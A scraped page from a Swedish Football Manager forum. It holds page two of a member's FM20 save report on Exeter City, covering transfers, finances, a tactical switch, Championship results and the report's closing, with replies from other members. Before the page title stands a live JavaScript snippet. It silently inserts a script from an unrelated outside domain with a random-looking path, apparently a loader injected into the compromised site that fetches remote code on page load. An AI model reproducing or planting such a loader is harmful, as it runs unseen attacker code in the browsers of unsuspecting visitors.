;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM20] Exeter City – The Trust – Sida 2 – Avslutade rapporter – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[Stängt] [FM20] Exeter City - The Trust

36 Inlägg
11 Users
84 Reactions
2,595 Visningar
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  
Postad av: @kristijan

Det blev en spännande kval final. härligt att det gick vägen.


Väldigt härligt! Blir ett spännande fönster nu!

   
TommyE
(@tommye)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
 

Kul save att följa. Bra blandning av screens och rapport från säsongen. Vilken helt sjuk finalmatch - utvisning, självmål och sen vända till 3-1 med en man mindre.


   
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  
Postad av: @tommye

Kul save att följa. Bra blandning av screens och rapport från säsongen. Vilken helt sjuk finalmatch - utvisning, självmål och sen vända till 3-1 med en man mindre.

Tack! Kul att du tycker det. Haha ja den var något alldeles extra. 

Något du saknar i rapporteringen?


   
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  


Inför Exeters debut i Engelska Championship har det hänt väldigt mycket. Det har hänt väldigt mycket på transfermarknaden men också en del utanför som är värt att rapportera. 

Det är som sagt första gången i historien som Exeter mäter sig på den här nivån. Vi är tippade att komma näst sist och det finns väl egentligen ingen alls som tror på oss. Och om vi ska ha någon chans att störa motståndarna över 46 omgångar så krävs det en hel del nyförvärv. Transferbudgeten som styrelsen gav mig var dock bara 8 miljoner kronor och för det får jag inte in mycket kvalité. Men förutsättningarna ändrades en hel del då Chelsea erbjöd sig att sälja av en del klausuler och då nappade jag direkt då detta säkerställer det ekonomiska läget i klubben samt ger mig lite mer kraft på transfermarknaden. Jag har också möjligheten att göra samma sak med Ollie Watkins, men där erbjuds enbart 13 miljoner kr, då väljer jag hellre att vänta.

Utöver detta ekonomiska tillskott till klubbkassan så har det också rört på sig en del utåt. Vår guldgosse Isaac Lihadji klargör tydligt inför säsongen att han är redo att ta nästa steg i karriären. Det trillar dock inte in några bud och jag vill heller inte erbjuda honom till andra klubbar då han endast är värderad till 5,25 miljoner kronor. Men några veckor in i juli så kommer sedan ett bud som jag inte kan tacka nej till. 

Självklart en väldigt tung förlust för oss då han var vår bästa spelare förra säsongen tillsammans med Williams. Men detta är också en väldigt bra affär för Exeter, speciellt när han anlände gratis inför förra säsongen. Detta ger oss också kraft att förstärka truppen på flera positioner. I det här avtalet finns det också en vidareförsäljningsklausul på 35% inbakad. Utöver denna försäljning så händer det inte mycket mer än att vår rutinerade anfallare Ryan Bowman lämnar för Dundee. Efter 70 matcher och 24 mål under min ledning så säljs han för 2,35 miljoner kronor.


Spelare inåt däremot har jag en hel del att presentera för er. Tack vare de ekonomiska tillskotten ovanför fick vi möjligheterna till att plocka in en rad intressanta spelare. Utöver nedanstående spelar så har även lånet av högerbacken Devid Bouah från Roma förlängts ytterligare ett år.

Som ni ser så är Liam Gibbs ett riktigt dyrt nyförvärv. Gibbs är en 18 år gammal central mittfältare som ser väldigt lovande ut. Övertygad om att detta kommer att bli en nyckelspelare över tid samt även en framtida storförsäljning.
Andra spelare som kommer in är några jag har hållit koll på sedan första säsongen. Framförallt mittbackarna Dan Happe, Nathan McGinley och yttern Courney Senior. Ska bli kul att se om dessa håller på en högre nivå när jag äntligen fick möjligheten att köpa loss dessa. Jag tar vara på samarbetet med Arsenal och lånar in ytterligare tre spelare, då det är extra kul att Gigovic fick möjligheten att stanna. Sen är jag väldigt nöjd med att jag fick in en favorit i Max Power, mest på grund av hans namn.
Keanan Bennets lånades in i sista stund då jag aldrig riktigt hittade någon ersättare till Lihadji. Han kommer att konkurrera med Farrugia och Senior.

Spoiler
Nyförvärv screens


Det ekonomiska läget även efter dessa värvningar ser bra ut. Detta glädjer mig väldigt mycket då jag förhoppningsvis snart kan börja investera i våra faciliteter. 

Nästa rapportering kommer efter ungefär en tredjedel av säsongen. Då tänkte jag också visa upp några av mina juniorer som redan nu har tagit enormt stora steg i sin utveckling. Nu är det dags för premiär hemma mot Reading!


   
TommyE and OgFelipe reacted
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  


Blir en senare rapportering likt tidigare då jag inte riktigt haft tiden till att göra en efter en tredjedel också. Vi har klarat oss bra i Championship hittills och står upp bra mot de flesta lagen. Tabelläget efter 33 omgångar:

Vi startade säsongen på ett utmärkt sätt, obesegrade efter 6 omgångar. Efter 22 omgångar låg vi på en nionde plats men hade efter det sju raka förluster. Mina yttrar presterade inte alls och vi gjorde gjorde inte längre några mål. Små taktiska justeringar fungerade inte heller riktigt, så jag valde att ändra om helt och numera spelare vi en 4-1-3-2, med tre centrala mittfältare bakom en DM och två anfallare på topp. Tack vare detta så valde jag att sälja båda yttrarna Farrugia och Senior som köptes in inför säsongen. Tyvärr två jättefloppar och missar av mig - men vi fick nästan hela kakan tillbaka på försäljningarna iallafall. Redan i december erbjöd Sheffield United mig möjligheten att få pengar redan nu för den vidareförsäljningsklausul på 35% som ingick i avtalet när jag sålde Isaac Lihadji. Jag erbjöds 39 miljoner kronor och då hade Lihadji inte gjort en match i Sheffieldtröjan (han är numera utlånad till Wimbledon i League 2). Så med hjälp av den slanten och försäljningarna så valde jag att lägga rejält krut på ett par nyförvärv och gå all in på mitt nya spelsätt.

https://fmshots.com/image/PBK5D

Först in kom Joe Gelhardt från Wigan. Den 19-årige talangen följde med Wigan ner i League 1 och fick där rätt så skralt med speltid. Han jagades även av ett par större lag i Championship men valde tillslut att spela för Exeter. En väldigt stor summa såklart, men med tanke på att vi fått ihop en stabil ekonomi och att vi kommer lösa nytt kontrakt i ligan så känner jag mig ändå bekväm med kostnaden. Dessutom en spelare som kan ta rejäla kliv i utvecklingen och bli riktigt bra. Han pekas dessutom ut som den nästa Michael Owen.. Spännande! 

https://fmshots.com/image/PB8mM

Den andra värvningen jag gör är Cameron Brannagan från Oxford. Den Liverpoolfostrade mittfältaren har jag haft ögonen på sen start och nu får jag möjligheten att ta in honom tack vare en klausul på 15 miljoner. En riktigt bra spelare som jag hoppas väldigt mycket på. Dessutom ett välbehövligt tillskott på mittfältet då Arsenal valde att plocka tillbaka Gigovic redan efter 8 omgångar, så det har saknats kvalité på den positionen.

Tänkte också visa upp några av de newgens som jag plockade in inför andra säsongen och ett par inför tredje för den som är intresserad. Några riktigt fina spelare har jag här och förhoppningsvis ett par stora försäljningar i framtiden.

Spoiler
Screenshots


 


   
TommyE and OgFelipe reacted
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  


Debutsäsongen i Championship är nu färdigspelad. All media, jag själv inte långt ifrån, tippade oss som en favorit till att åka ur. Visst förstärkte vi truppen någorlunda vilket gjorde att jag ändå hoppades på att jag skulle klara mig kvar, men att det skulle gå så bra som det gjorde var inget jag förväntade mig. 

Vi slutar på en imponerande elfte plats. Någon bottenstrid var egentligen aldrig aktuellt, inte heller placeringar högre upp i tabellen. Men jag är supernöjd med den här bedriften. Tillsammans med Accrington har vi överlägset de lägsta löneutgifterna och när man ser att Accrington tar ynka 19p över 46 matcher så blir vår insats än mer imponerande. Vi förlorar ynka tre matcher på vår hemmaborg St James Park, något som vi förhoppningsvis kan ta med oss in i nästa säsong. I cupen gick det helt okej, men som tidigare år fick vi även nu en tuff lottning.

Vi slår återigen ut West Ham på bortaplan i ligacupen. Kul att vi har blivit en mardrömsmotståndare för West Ham. Sen fick vi tyvärr Man City och rök såklart. Dock fick vi in fina publikintäkter i båda dessa matcher, över 10 miljoner kr sammanlagt. I FA-cupen fick vi tuff lottning direkt och där var det inget snack heller. Uttåg direkt mot Wolves.


Det ekonomiska läget ser bra ut. Styrelsen har belönat mig med en transferbudget på ungefär 100 miljoner. Min tanke är dock att försöka hålla truppen så intakt som möjligt, men det vet man aldrig riktigt hur det blir innan olika möjligheter dyker upp. Nästa uppdatering kommer jag att gå igenom vad som har hänt på transfermarknaden och lite tankar inför nästa säsong.


 


   
TommyE reacted
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  


Så var det dags för andra säsongen i Championship, år 2022/2023. Har redan hunnit spela fyra matcher men mer om resultaten i senare inlägg när en större del är spelad. Media ser förra årets prestation som en engångsföreteelse och tippar oss att sluta på plats 20. Vår styrelse har lite högre krav och vill att vi kniper en mittenplacering. Mer rimligt, men själv har jag satt högre krav än så. Jag hoppas att vi kan knipa en plats på övre halvan och inte vara allt för långt kvalplatserna. Det finns dock väldigt många stora lag i serien som gör det svårt att ta upp kampen om en slutspelsplats, bland annat Everton, Leeds, West Ham och Sheffield United. 

I förra inlägget skrev jag att förhoppningen var att behålla truppen i stora delar. Dels för att hålla lite i pengarna men också för att jag ser stor potential i mina unga spelare. Förhoppningsvis kan några ta ytterligare ett kliv.
Vi behövde bara sälja en enda spelare - Randell Williams. Randell som varit en viktig kugge för oss i de lägre divisionerna, men som inte presterade på samma sätt när nivån höjdes. En helt okej summa in hur som helst och vi tackar Randell för hans fina år hos oss. Annars lånar vi ut en del juniorer igen. Utöver dessa har vi också släpt Burgess då hans kontrakt gick ut.

Inåt har det också varit väldigt lugnt. En ersättare på målvaktsposten togs in då Lewis Ward ville lånas ut. En ersättare till Burgess togs också in (fjärde alternativ på mittbackspositionen). Sen förlängdes även Devid Bouahs lån ytterligare ett år, gör nu sin tredje säsong hos oss.

Väldigt nöjd med att kunna förlänga lånet med Bouah då det är väldigt svårt att hitta prisvärda högerbackar att ta in. En dröm är att kunna köpa loss Bouah snart då han presterar väldigt bra. Jussis son Will anländer också. En målvakt jag ville ha in tidigare säsong när han spelade i Crewe, men som valde att gå till Bajen. Tycker han är väldigt bra och kommer möjligtvis att få ta förstaspaden direkt från Remi Matthews. Reon Goddard är en ung mittback som jag hoppas kan ta stora kliv i utvecklingen. Kommer att spela med reservlaget och kommer förmodligen inte göra någon seniormatch om ingen mittback blir skadad.

Spoiler
Screenshots nyförvärv


Något annat som hände under förra säsongen var ju att jag valde att byta spelsätt. Vår tidigare 4-2-3-1 med yttrar slopades och alla yttrar är nu sålda. Den nya formationen blev en central historia och som har fungerat väldigt väldigt bra. Den ser ut så här.

En taktik som låter oss att föra matcherna på ett helt annat sätt med ett stort bollinnehav. Ytterbackarna presterar mycket bättre nu jämfört med när dem hade en ytter framför sig. Många mål och assist från deras fötter. Den defensiva mittfältaren Wintle har höjt sig rejält och snittar över 7.20 nästan varje match i sin nya roll och skyddar försvaret på ett bra sätt. Men framförallt är det en spelare som trivs bäst med sin roll här. Herregud, Cameron Brannagan. 

Titta på dessa siffror! Han är bäst på plan - varje match. Vi kan torska med 3-0 men han får ändå betyg över 7.0. Jag var lite skeptisk till att ha min spelfördelare till vänster, men då det är något han själv föredrar plus att jag får in min IM-AT i bättre ytor så körde jag på det. Och det är inget jag ångrar direkt. Vad har han gjort i Oxford så länge?


Något annat positivt som händer i klubben tack vare att ekonomin blivit stabil så har vi kunnat investera i faciliteterna. Våra faciliteter är verkligen i behov av detta. Träningsanläggningen bedöms i nuläget vara tillräcklig, ungdomsanläggningen likaså. Förhoppningsvis kan detta leda till att vi får fram bättre spelare i framtiden, då vår ungdomsträning redan är utmärkt. Vi har också tagit beslutet att köpa loss St James Park, som numera ägs av klubben. Om detta är något bra beslut av mig vet jag inte riktigt, har dålig koll på vad för skillnader det gör ekonomiskt. Någon som har koll på det? Det låter ju positivt hur som helst.


   
TommyE and OgFelipe reacted
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  

Vi börjar verkligen leverera när det gäller försäljningar. Lulic som hittades klubblös i det kroatiska u19-landslaget säljs ett år senare för 80 miljoner + 40% vidareförsäljningsklausul - utan att ha gjort ett enda framträdande i Exetertröjan ?  

 


   
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  

En tredjedel av säsongen är spelad och vi imponerar stort som ni ser. Vi lyckas studsa tillbaka efter nederlagen och undviker därför svackorna. Några spelare sticker ut med helt fantastiska prestationer. Först och främst har vi skytteligaledaren, Joe Gelhardt, som börjar visa att han kanske är den nästa Michael Owen. På 16 matcher har han gjort 12 mål och en assist och snittar 7.51. Brannagan fortsätter att imponera även han. Står just nu på 2+7 och ett snittbetyg på 7.51. Måste också nämna hela backlinjen som gör det fantastiskt bra, både defensivt och offensivt. 11 mål och 8 assist har försvararna stått för i ligan, helt otroligt. Mittbacken Sam Hughes står på fem baljor.

Nu byggs även St James Park ut med drygt 4000 platser. Vi fyller arenan match efter match och behöver därför bygga ut. Nu hoppas vi att vi öser vidare här och är med och slåss även efter två tredjedelar!


   
TommyE reacted
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  


Ni vet själva hur man förlorar sig i spelet och det bara rullar på och man vill varken pausa eller avsluta spelet. Hade en sån dag idag och därför blev det ingen mer rapport runt januarifönstret, utan jag hann spela klart hela säsongen. Kan ju meddela att det inte hände något alls på transfermarknaden i januari, varken in eller ut. 

Hur som helst är säsongen färdigspelad. Säsongen 2022/2023 slutade på följande vis.

Vi gör återigen en fantastisk säsong med tanke på förutsättningarna jämfört med alla andra klubbar (förutom Rochdale). Vi hade en dipp i januari/februari där vi låg 13p efter kvalplats, men sedan kör vi över allt och alla och lyckas ta oss upp på en femteplats. Där ställs vi mot Reading i semifinalen. 

Jag trodde verkligen att vi skulle köra över Reading i första matchen. Vi avslutade säsongen med en 5-0 seger borta mot Middlesbrough och tänkte att vi skulle ta den här matchen enkelt. Men som ni ser ville Reading annat och vi skapade ta mig fan knappt någonting på hela matchen. Välförtjänt seger för Reading och ett fruktansvärt resultat att ta med sig till returmötet på bortaplan.

Och vi lyckas inte få in bollen i den här matchen heller. Vi försöker trycka ordentligt sista halvtimmen men lyckas inte då heller. Väldigt bittert slut på den här fantastiska säsongen men samtidigt är jag inte så besviken över hur det slutade. Vi är väääldigt långt ifrån att vara redo för Premier League. Vi skulle må bra av ett gäng till säsonger i Championship även om man såklart vill upp fortast möjligt. Men nya tag nästa säsong! 


Arenabygget går liksom kvalspelet även det i stöpet. Inte så mycket att göra tyvärr, men väldigt tråkigt.


En sista grej jag vill dela med mig om är något jag delvis inte varit med om tidigare på Football Manager. Min vänsterback Charles Nicolle valde att komma ut som homosexuell. 

Jag har tidigare haft spelare som kommit ut som homosexuell på spelet, men aldrig tidigare fått nyheten som ni ser på andra bilden. Hur som helst modigt av den gode Charles och jag han tar en ännu finare plats i mitt hjärta framöver. Klart man ska köpa hans tröja! 


   
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  


Mina mål
- Gå upp till League 1 [X]
- Gå upp till Championship [X]
- Gå upp till Premier League [  ]
- Vinna Premier League [  ]
- Vinna FA-cupen/ligacupen [  ]
- Vinna EL/CL [  ]

- Skapa en stabil ekonomi
- Få fram A-lagspelare från vår egna led
- Utveckla faciliteterna till toppklass.

Tänkte återkoppla till målen som jag satte upp inför saverapporten innan jag går igenom truppläget inför vår tredje säsong i Championship. Som ni ser börjar jag närma mig halvvägs vad det gäller dem sportsliga målen. Avancemanget till Premier League närmar sig och förhoppningsvis kan vi bocka av det inom de närmsta säsongerna. De inhemska cuperna lär nog dröja ett tag till, iallafall tills jag är ett stabilt lag i Premier League.

De lite mer skeva målen som är svåra att mäta är egentligen målen som intresserar mig mest. Ekonomin börjar bli stabil med en balans på ungefär 250 miljoner kronor (tack vare en försäljning om presenteras lite längre ner). Jag ser inte att den kommer att rasa så mycket heller, snarare tvärtom med tanke på att jag har väldigt många stora talanger i truppen samt seriens näst lägsta lönepost. Faciliteterna är helt klart på uppgång och vi har redan hunnit med att utveckla dem ett steg. 

Träningsanläggningen och ungdomsakademin har såklart en lång väg kvar till att bli toppklass. I detta nu håller ungdomsakademin på att uppgraderas ytterligare.

Sen är det mitt favoritmål kvar - få fram A-lagspelare från våra egna led. Vi börjar närma oss här men det behövs bättre faciliteter för att ta det sista steget som gör att vi får fram bra spelare år efter år. Vi har en utmärkt ansvarig för ungdomsutveckling och riktigt bra tränare för vårat u18-lag. Tänkte visa er två spelare som iallafall kan nosa på att vara med i min A-lagstrupp, men som nu är utlånade ytterligare en säsong.

Spoiler


Inför säsongen 2023/2024

Efter en elfte respektive femte plats i Championship vågar jag nu påstå att vi är ett etablerat lag för den övre halvan, som bör nosa på kvalplatserna. Inför den tredje säsongen så placerar media oss på en nionde plats vilket är något som stämmer bra överens med mina egna förväntningar. Precis som förra säsongen hoppas jag att kunna vara med och slåss om kvalplatserna. Det har hänt lite på transfermarknaden som är värt att notera.

Spoiler
Nicolle

En fantastisk försäljning. Charles plockades in gratis från Cardiff Metropolitan University inför säsongen 2020/2021. Att vi sedan kan sälja honom för 270 miljoner kronor är en delikat affär. Tråkigt att tappa Charles då han varit en stor favorit för mig och varit lysande på vänsterkanten. Vi har dock redan en vänsterback i Dave Leigh som är lika bra som Charles, och som nu kommer att axla den rollen på ett utmärkt sätt. Vi har också plockat in en reserv på positionen i Jake Vokins som ansluter på fri transfer. Vokins som ju var utlånad till oss för några säsonger sedan i lite lägre divisioner. 

Spoiler
Leigh & Vokins

Utöver försäljningen av Nicolle har det inte hänt något utåt förutom att jag lånat ut lite juniorer. Inåt så har jag förlängt lånet igen(!) med Devid Bouah som nu gör sin fjärde säsong i klubben. Jag lånar också in Harwood-Bellis från Manchester City för att ge bredd och mer kvalité på mittbackspositionerna. Sedan har jag plockat in en högerback som förhoppningsvis kan slåss om en plats i framtiden.

Spoiler
Harwood-Bellis & Donnarumma

Med dessa värvningar ser truppen inför säsongen ut så här:


Ett kul kvitto på att jag har gjort ett bra jobb med Exeter är att flera klubbar kontaktat mig det senaste året. Först var det klubbar som Wigan & Birmingham. Men statusen verkar ha höjt sig ytterligare den sista tiden då Wolfsburg, Lazio och självaste Manchester United kontaktat mig. Väldigt kul!


   
OgFelipe reacted
Jimpacool
(@jimpacool)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 17
 

Fin rapport!
Gillar upplägget när man tar mindre klubbar och utvecklar dessa. Fin snittålder på truppen också!


   
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  
Postad av: @jimpacool

Fin rapport!
Gillar upplägget när man tar mindre klubbar och utvecklar dessa. Fin snittålder på truppen också!

Tack! Ja det är alltid kul faktiskt så länge man har tålamodet. Kul att du följer!


   
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  


Den femte säsongen med mitt kära Exeter löper på och vi är nu inne på slutspurten av säsongen. Januarifönstret är avklarat och det har hänt massor, mycket mer än vad jag tänkte från början. Vi är med i kampen om kvalplatserna uppåt och borde egentligen försöka behålla stora delar av truppen, men så blev det inte. Flera av spelarna som såldes började kräva nya dyra kontrakt som jag inte ville ge och då valde jag istället att skeppa iväg dessa spelare och ta in billigare ersättare. Bra sportsligt? Tveksamt. Bra ekonomiskt? Sannerligen.

Sam Hughes köptes för 780t kr sommaren 2020, säljs nu för 102 miljoner kr.
Ryan Wintle köptes för 4 miljoner kr sommaren 2020, säljs nu också för 102 miljoner kr.
Regan Poole köptes för 4,75 miljoner kr sommaren 2021, säljs nu för 70 miljoner kr.
Brian O'Connor köptes för 110t kr under 2020 och säljs för 35 miljoner kr.

Verkligen helt fantastiska affärer för klubben. Även McGinley gör vi en vinst på med nästan 16 miljoner kr. Egentligen bara O'Connor som jag ser utvecklingspotential i här men har tyvärr alldeles för bra anfallare att konkurrera med här. 

Jordan Storey värvas in för att ersätta Sam Hughes i mittlåset. Storey som var i klubben 2015-2017 återvänder nu efter några år i Preston. Mittfältaren Alhassan Yusuf, en av Allsvenskans bästa spelare, värvas in som ersättare till Wintle. Martin Martinez från Granada ska ge bredd på anfallspositionerna och förhoppningsvis fortsätta utvecklas till en stjärna. Dewhurst plockar jag in för att konkurrera med Jääskeläinen då reserven Matthews fått lämna.

Spoiler
Nyförvärv


Vi har hunnit spela 36 omgångar så nu är det bara 30 poäng kvar att spela om. Kul att vi återigen är med och slåss där uppe i toppen, en tydlig signal om att vi är i toppen för att stanna. Truppförändringarna har inte påverkat så mycket än så länge utan vi håller uppe en helt okej form. Förhoppningsvis kan vi hålla ut och knipa en slutspelsplats i år igen. Lär väl komma en uppdatering snart igen om hur säsongen slutade.


   
TommyE and OgFelipe reacted
Kenka
(@kenka)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 41
Topic starter  

Är extremt ledsen över att jag måste lägga ner den här rapporten. Jag kommer inte att få ihop den tid som krävs för att fortsätta rapportera utan kommer bara att ha tid för att spela lite grann i veckan, på grund av nytt jobb och annat i livet. Kan meddela att jag slutade på en åttonde plats och missade kvalet. Kämpar vidare på egen hand! Tack för att ni följt!


   
trashbag
(@trashbag)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 193
 

Alltid tråkigt när en rapport med ett väldigt intressant lag läggs ner men jag förstår. Det är helt klart bättre att satsa på livet utanför dumburken när tillfälle som nytt jobb med mera ges. Har själv någonstans insett efter att min semester tagit slut att det kommer bli väldigt lite spelande under vardagarna framöver om jag ska nå dom mål jag satt upp för mig själv gällande jobb men även privatliv. Lycka till och hoppas att du har tid för en FM-rapport någon gång i framtiden!


   
Sida 2 / 2
Share: